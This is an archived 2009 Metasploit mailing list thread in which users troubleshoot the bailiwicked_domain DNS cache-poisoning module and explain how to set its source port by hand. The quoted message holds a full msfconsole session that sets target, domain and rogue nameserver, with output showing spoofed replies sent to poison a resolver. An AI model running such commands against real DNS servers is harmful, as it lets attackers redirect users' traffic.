Metasploit mailing list archives
bailiwicked_domain not working anymore?
From: j.s.sebastian at gmail.com (Paolo Milani)
Date: Mon, 20 Jul 2009 17:09:54 +0200
Hi, I had the same problem. The thing is that the authoritative nameserver used to find out the source port used by the recursive server is not running anymore. Quoting my previous email to this list: "To check if a server is vulnerable (uses a static source port), and to find out which port it uses, this module sends TXT queries for domains like: spoofprobe-check-1-9997847822.red.metasploit.com I presume that the server for the red subdomain should then reply putting the port number used by the server in the TXT section. Unfortunately this server is down (in fact, the red subdomain does not resolve)." Since sending back the src port of the server in the TXT section is not standard DNS behavior, and the code for this server doesn't seem to have been released, even if you set up your own authoritative server the check functionality will still not work. Of course you can set up your own authoritative server, do a query to it through the recursive resolver, and just check which port it uses to query you. Then in metasploit you can just do set SRCPORT <port number>. ciao Paolo Milani Richard Miles wrote:
Yo I recently tested the bailiwicked_domain exploit from Metasploit against 2 different servers, and both failed the exploitation. Both servers show to be vulnerable, similar to this one output: porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net. "myDNSserver is POOR: 26 queries in 1.9 seconds from 26 ports with std dev 7" I used this test: dig +short porttest.dns-oarc.net TXT @myDNSserver Both DNS servers show to be vulnerable (POOR). When exploit with Metasploit, the first problem is that "check" always fail saying my DNS doesn't accept recursive queries. msf auxiliary(bailiwicked_domain) > check [*] Using the Metasploit service to verify exploitability... [*] ERROR: This server is not replying to recursive requests That is completely wrong, my server accept recursive queries. Even if I quit metasploit or even open another terminal I can query ANY host in the internet. Is it a know problem? Well, anyway I tried to exploit the flaw, using this: msf > use auxiliary/spoof/dns/bailiwicked_domain msf auxiliary(bailiwicked_domain) > set RHOST myDNSserver RHOST => myDNSserver msf auxiliary(bailiwicked_domain) > set DOMAIN sexy.com DOMAIN => sexy.com msf auxiliary(bailiwicked_domain) > set NEWDNS www.google.com NEWDNS => www.google.com msf auxiliary(bailiwicked_domain) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_domain) > exploit [*] Targeting nameserver myDNSserver for injection of sexy.com. nameservers as www.google.com [*] Querying recon nameserver for sexy.com.'s nameservers... [*] Got an NS record: XXXXXXXXXXXXXXXX [*] Removed: It's just DNS resolution. [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.04/0.17/0.07 | min/max/avg replies: 4/67/28 [*] Sending 14 spoofed replies from each nameserver (3) for each query [*] Attempting to inject poison records for sexy.com.'s nameservers into myDNSserver:0... [*] Sent 1000 queries and 42000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.04/103.53/4.22 | min/max/avg replies: 3/65337/2633 [*] Now sending 1316 spoofed replies from each nameserver (3) for each query And the Metasploit keeps in this stage for a long time (at the moment, more than 1 hour). There is anything wrong with the exploit? Or I'm using it wrong? I'm following this tutorial: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt Any tips are welcome. thanks _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Richard Miles (Jul 20)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- Error while running meterpreter winenum script wfdawson at bellsouth.net (Jul 21)
- Error while running meterpreter winenum script Carlos PĂ©rez (Jul 21)
- bailiwicked_domain not working anymore? HD Moore (Jul 20)
- bailiwicked_domain not working anymore? Paolo Milani (Jul 20)